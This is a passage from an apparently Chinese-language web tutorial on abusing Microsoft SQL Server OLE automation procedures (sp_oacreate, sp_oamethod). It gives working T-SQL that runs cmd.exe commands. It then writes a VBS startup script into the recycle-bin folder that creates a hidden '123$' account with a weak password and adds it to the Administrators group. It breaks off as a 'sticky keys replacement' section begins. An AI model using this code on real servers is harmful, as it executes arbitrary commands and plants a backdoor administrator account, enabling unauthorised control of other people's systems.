    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oacreate </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Shell.Application'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">out</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'ShellExecute'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">null</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'cmd.exe'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'cmd /c net user >c:\test.txt'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\windows\system32'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">''</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'1'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
   </ol>
  1. 写入启动项

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@sp_passwordxieo</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@t</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oacreate </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'scripting.filesystemobject'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@sp_passwordxieo</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">out</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@sp_passwordxieo</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'createtextfile'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">out</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'d:\RECYCLER\1.vbs'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'os="WinNT://"&wsnetwork.ComputerName'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Set ob=GetObject(os)'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Set oe=GetObject(os&"/Administrators,group")'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Set od=ob.Create("user","123$")'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'od.SetPassword "123"'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'od.SetInfo'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Set of=GetObject(os&"/123$",user)'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@ret</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'writeline'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> NULL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'oe.add os&"/123$"'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
   </ol>
  1. 粘贴键替换

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span></code></span></span></p></li>
